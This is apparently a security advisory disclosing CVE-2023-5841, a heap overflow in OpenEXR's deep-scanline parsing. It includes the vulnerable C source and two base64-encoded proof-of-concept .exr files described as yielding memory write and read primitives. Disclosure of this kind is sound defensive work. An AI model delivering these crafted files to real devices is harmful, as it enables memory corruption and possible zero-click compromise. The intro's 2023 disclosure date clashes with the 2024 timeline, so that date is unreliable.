CVE-2023-5841: Academy Software Foundation OpenEXR Heap Overflow in Scanline Deep Data Parsing
AHA! has discovered an issue with OpenEXR from The Academy Software Foundation, and is publishing this disclosure in accordance with AHA!’s standard disclosure policy today, on Wednesday, Jan 31, 2023. CVE-2023-5841 has been assigned to this issue.
Any questions about this disclosure should be directed to [email protected].
Executive Summary
Due to a failure in validating the number of scanline samples of a OpenEXR file containing deep scanline data, Academy Software Foundation OpenEXR image parsing library version 3.2.1 and prior is susceptible to a heap-based buffer overflow vulnerability. CVE-2023-5841 appears to be an instance of CWE-122.
Technical Details
Within the generic_unpack_deep() function, the samps value, which is obtained from the sampbuffer array and is sourced from the input .exr file, is passed to the UNPACK_SAMPLES macro (line 1264).
src/lib/OpenEXRCore/unpack.c
1209 static exr_result_t
1210 generic_unpack_deep (exr_decode_pipeline_t* decode)
1211 {
1212 const uint8_t* srcbuffer = decode->unpacked_buffer;
1213 const int32_t* sampbuffer = decode->sample_count_table;
1214 uint8_t* cdata;
1215 int w, h, bpc, ubpc;
1216 size_t totsamps = 0;
1217
...
...
1253 for (int x = 0; x < w; ++x)
1254 {
1255 int32_t samps = sampbuffer[x];
1256 if (0 == (decode->decode_flags &
1257 EXR_DECODE_SAMPLE_COUNTS_AS_INDIVIDUAL))
1258 {
1259 int32_t tmp = samps - prevsamps;
1260 prevsamps = samps;
1261 samps = tmp;
1262 }
1263
1264 UNPACK_SAMPLES (samps)
1265
1266 srcbuffer += bpc * samps;
1267 if (incr_tot) totsamps += (size_t) samps;
1268 }
1269 }
1270 sampbuffer += w;
1271 }
1272
1273 return EXR_ERR_SUCCESS;
1274 }
The entire UNPACK_SAMPLES macro can be seen below and contains a set of switch statements that are used to parse the source buffer stored in the srcbuffer variable. This parsing is done through loop statements within the macro which all use the samps count as a the loop bounds. Because this value is sourced from the file and is never validated against the size of the destination buffer, a heap buffer overflow can occur.
src/lib/OpenEXRCore/unpack.c
972 #define UNPACK_SAMPLES(samps) \
973 switch (decc->data_type) \
974 { \
975 case EXR_PIXEL_HALF: \
976 switch (decc->user_data_type) \
977 { \
978 case EXR_PIXEL_HALF: { \
979 const uint16_t* src = (const uint16_t*) srcbuffer; \
980 for (int s = 0; s < samps; ++s) \
981 { \
982 *((uint16_t*) cdata) = unaligned_load16 (src); \
983 ++src; \
984 cdata += ubpc; \
985 } \
986 break; \
987 } \
988 case EXR_PIXEL_FLOAT: { \
989 const uint16_t* src = (const uint16_t*) srcbuffer; \
990 for (int s = 0; s < samps; ++s) \
991 { \
992 uint16_t cval = unaligned_load16 (src); \
993 ++src; \
994 *((float*) cdata) = half_to_float (cval); \
995 cdata += ubpc; \
996 } \
997 break; \
998 } \
999 case EXR_PIXEL_UINT: { \
1000 const uint16_t* src = (const uint16_t*) srcbuffer; \
1001 for (int s = 0; s < samps; ++s) \
1002 { \
1003 uint16_t cval = unaligned_load16 (src); \
1004 ++src; \
1005 *((uint32_t*) cdata) = half_to_uint (cval); \
1006 cdata += ubpc; \
1007 } \
1008 break; \
1009 } \
1010 default: return EXR_ERR_INVALID_ARGUMENT; \
1011 } \
1012 break; \
1013 case EXR_PIXEL_FLOAT: \
1014 switch (decc->user_data_type) \
1015 { \
1016 case EXR_PIXEL_HALF: { \
1017 const uint32_t* src = (const uint32_t*) srcbuffer; \
1018 for (int s = 0; s < samps; ++s) \
1019 { \
1020 uint32_t fint = unaligned_load32 (src); \
1021 ++src; \
1022 *((uint16_t*) cdata) = float_to_half_int (fint); \
1023 cdata += ubpc; \
1024 } \
1025 break; \
1026 } \
1027 case EXR_PIXEL_FLOAT: { \
1028 const uint32_t* src = (const uint32_t*) srcbuffer; \
1029 for (int s = 0; s < samps; ++s) \
1030 { \
1031 *((uint32_t*) cdata) = unaligned_load32 (src); \
1032 ++src; \
1033 cdata += ubpc; \
1034 } \
1035 break; \
1036 } \
1037 case EXR_PIXEL_UINT: { \
1038 const uint32_t* src = (const uint32_t*) srcbuffer; \
1039 for (int s = 0; s < samps; ++s) \
1040 { \
1041 uint32_t fint = unaligned_load32 (src); \
1042 ++src; \
1043 *((uint32_t*) cdata) = float_to_uint_int (fint); \
1044 cdata += ubpc; \
1045 } \
1046 break; \
1047 } \
1048 default: return EXR_ERR_INVALID_ARGUMENT; \
1049 } \
1050 break; \
1051 case EXR_PIXEL_UINT: \
1052 switch (decc->user_data_type) \
1053 { \
1054 case EXR_PIXEL_HALF: { \
1055 const uint32_t* src = (const uint32_t*) srcbuffer; \
1056 for (int s = 0; s < samps; ++s) \
1057 { \
1058 uint32_t fint = unaligned_load32 (src); \
1059 ++src; \
1060 *((uint16_t*) cdata) = uint_to_half (fint); \
1061 cdata += ubpc; \
1062 } \
1063 break; \
1064 } \
1065 case EXR_PIXEL_FLOAT: { \
1066 const uint32_t* src = (const uint32_t*) srcbuffer; \
1067 for (int s = 0; s < samps; ++s) \
1068 { \
1069 uint32_t fint = unaligned_load32 (src); \
1070 ++src; \
1071 *((float*) cdata) = uint_to_float (fint); \
1072 cdata += ubpc; \
1073 } \
1074 break; \
1075 } \
1076 case EXR_PIXEL_UINT: { \
1077 const uint32_t* src = (const uint32_t*) srcbuffer; \
1078 for (int s = 0; s < samps; ++s) \
1079 { \
1080 *((uint32_t*) cdata) = unaligned_load32 (src); \
1081 ++src; \
1082 cdata += ubpc; \
1083 } \
1084 break; \
1085 } \
1086 default: return EXR_ERR_INVALID_ARGUMENT; \
1087 } \
1088 break; \
1089 default: return EXR_ERR_INVALID_ARGUMENT; \
1090 }
This vulernability is by default unreachable through the exr* utilities provided with
the OpenEXR library because of a conditional in the checkCoreFile function (lines 1489-1492 below) which prevent the processing of EXR image files with the DEEP_SCANLINE/DEEP_TILE storage modes.
This however only prevents the exr* utilities from reaching the vulnerable code and direct calls
to other parsing functions (such as readCoreScanlinePart) within the OpenEXR library still reach the vulnerable path.
src/lib/OpenEXRUtil/ImfCheckFile.cpp
1474 bool
1475 checkCoreFile (exr_context_t f, bool reduceMemory, bool reduceTime)
1476 {
1477 exr_result_t rv;
1478 int numparts;
1479
1480 rv = exr_get_count (f, &numparts);
1481 if (rv != EXR_ERR_SUCCESS) return true;
1482
1483 for (int p = 0; p < numparts; ++p)
1484 {
1485 exr_storage_t store;
1486 rv = exr_get_storage (f, p, &store);
1487 if (rv != EXR_ERR_SUCCESS) return true;
1488
1489 // TODO: Need to fill this in
1490 if (store == EXR_STORAGE_DEEP_SCANLINE ||
1491 store == EXR_STORAGE_DEEP_TILED)
1492 continue;
1493
1494 if (store == EXR_STORAGE_SCANLINE)
1495 {
1496 if (readCoreScanlinePart (f, p, reduceMemory, reduceTime))
1497 return true;
1498 }
1499 else if (store == EXR_STORAGE_TILED)
1500 {
1501 if (readCoreTiledPart (f, p, reduceMemory, reduceTime)) return true;
1502 }
1503 }
1504
1505 return false;
1506 }
Multiple .exr files which triggers the above described heap overflow can be found below.
[expand]
Write primitive from heap overflow:
di8xAQIAAABjb21wcmVzc2lvbgBjb21wcmVzc2lvbgABAAAAAHR5cGUAc3RyaW5nAA0AAABkZWVw
c2NhbmxpbmUAdmVyc2lvbgBpbnQABAAAAAEAAABjaGFubmVscwBjaGxpc3QAJQAAAEEAAAAAAAAA
AAABAAAAAQAAAAAArq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6u
rq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6u
rq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6u
rq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6u
rq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6u
rq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6u
rq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6u
rq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6u
rq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6u
rq6urq6urq6urq4AAAAAAAEAAAAAAAAAAQAAAAAAAAAA/wAAAAAAAAAAADoAAAA6AAAA////AP//
/wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////
AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A
////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD/
//8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP///wD///8A////AP//
/wD///8Arq4AAK6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6u
rq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6u
rq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6u
rq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6u
rq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq6urq4=
Alternatively, a read primitive can be achieved leveraging the same bug with the following PoC:
di8xAQIAAABnAAARASYmJiYmJiYmJian5EBnr2S1zEBAQEBAQEBAzn0nDH6dyiPFuFBpSulKZm5u
bm5ubgD/JiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmJiYmfv8mJtkmJiYmJiYmJiYmJiYmJiZ2ZXJz
aW9uMV4CMTLU1NQAAAAAAF8AALuAwg0DvhAIrqqbhONsH////////wAAjlVUgD4AJiYmJiYmJiYm
JiYmJgAAY2hyY29tcHJlc3Npb24AY29tcHJlc3Npb24AAQAAAAD/AAAmJiZubm5ubm5ubm5ubm5u
bm70qM084T4YPdT8YuIUBldXbmRvd0NlbnRlcgB2MmYACAAAAHYyZgFibGVlaWVlAAB0eXBlAHN0
cmluZwBfAAAAZGVlcHNjYW5saW5lAHIAf///AW9hdG1hdGljCXRpZXMwAAAB3gBjaABjaGxpc3QA
HAAAABAAAAAB/wAAABAAaQAAAQAA/mcAAP5nAAByAH///wFvYXRtYXQAAAABaWMJdGllczAAAAEA
Y2gAYwAAAP90AAAACABra2trazsra2tra2tr5Zcp6ib09XPqBi0xMZc5Wv9mbG9hdP////////8+
65He/kO+tTgXdw9VKwUAAADyAAAAfFUj49bgAAAA5eXl5eXla2UTBAAAAAAAAOXl5f//////////
5XYvMQHl5eXl5QH/dGltLzEB5eXl5eUB/3RpbWVjb3ljb2Rl5eXl5eXl///////////ldi8xAeXl
5eXlAf90aW1lY29kZf//AQBmbG9hdHZlY3RvcgAAAAAA//EAHWlldz4+Pj4+AOXl5eXl5eXl5eXl
5eVkaXNwbGF5V2luAABjaGFubmVscwBjaGxpc3QAPAAAABAAAAAAAAAAKgABAAAAAQAAAABkZWxp
AgAAAGNobGlzdHJlqRAAAAAAAABjaGxpc3RyZXNzaW9pdG9yAXcAAAAAAGNo/wAACE1NTXYyZE1N
TU30sAAAAAAAAGtleWNvZGXl5eXl5eX//////3L/AQD/AAAAnW94MTJpAAB0eXBlAAB0aWNpdGll
c+Xl5eXl5eXl5XYyZnBsYXlXaXlwZQBtMzNkAWV0aXKU4VQAAAAAAAAdAAAAaXKUbGWSNGF0M2Rw
cmVjaHKUbGVtNDRkAP8AAACdb3gxMmkCAAB5cGUAbTMzZAFldGlylGtlbTQ0ZH8AHQAAAGlylGxl
djNpdDNkcHJlY2hyb21hb3gxMmkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAABGgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
yyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZGQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAABAAAAAAAANAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAc3RyaQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAypAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIJAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqEAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACz
cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAANTQzMgAA
AAAAAAAAAAAAAAAAAAAAoZ8LAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAACwrgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADw0gAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAPwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQGQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAABA6wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2PkAAAAAAAAAAAAAAAAAAAAABoAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOXl5eXl5eXl
ZGlzcGxheVdpbgAAY2hhbm5lbHMAY2hsaXN0ADwAAAAQAAAAAAAAACoAAQAAAAEAAAAAZGVsaQIA
AABjaGxpc3RyZakQAAAAAAAAY2hsaXN0cmVzc2lvaXRvcgF3AAAAAABjaP8AAAhNTU12MmRNTU1N
9LAAAAAAAABrZXljb2Rl5eXl5eXl//////9y/wEA/wAAAJ1veDEyaQAAdHlwZQAAdGljaXRpZXPl
5eXl5eXl5eV2MmZwbGF5V2l5cGUAbTMzZAFldGlylGtlbTQ0ZH8AHQAAAGlylGxlkjRhdDNkcHJl
Y2hylGxlbTQ0ZAD/AAAAnW94MTJpAgAAeXBlAG0zM2QBZXRpcpRrZW00NGR/AB0AAABpcpRsZXYz
aXQzZHByZWNocm9tYW94MTJpAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAARoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMsg
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRkAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAQAAAAAAAAAAAAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADqEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAoZ8L
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA5wAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD1AAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
[/expand]
Attacker Value
This vulnerability allows for a read or write primitive based on the provided EXR file attributes and therefore could be used to read or write memory to a compromised device through an attacker placed EXR image.
Furthermore, this vulnerability exists within a image parsing library that is known to be used in popular mobile devices and messaging software. Specifically, the affected library is reported by Project Zero to be used by Apple iMessage. To quote P0:
the OpenEXR library is exposed through Apple’s ImageIO framework and therefore is exposed as a 0click attack surface through various popular messenger apps on Apple devices. It is likely that the attack surface is not limited to messaging apps, though I haven’t conducted additional research to support that claim.
Note that exploitation on this platform has not been tested by AHA!.
Credit
This issue is being disclosed through the AHA! CNA and is credited to: zenofex and WanderingGlitch
Timeline
- 2023-10-26 (Thu): Initial findings presented at AHA! Meeting 0x00cd.
- 2023-11-09 (Thu): PoC validated and this disclosure drafted.
- 2023-11-09 (Thu): Disclosed to the vendor via email at [email protected].
- 2024-01-25 (Thu): Reminded the vendor about the issue.
- 2024-01-31 (Wed): Disclosed CVE-2023-5841.
- 2024-02-11 (Sun): OpenEXR v3.2.2 and v3.1.12 released to address CVE-2023-5841
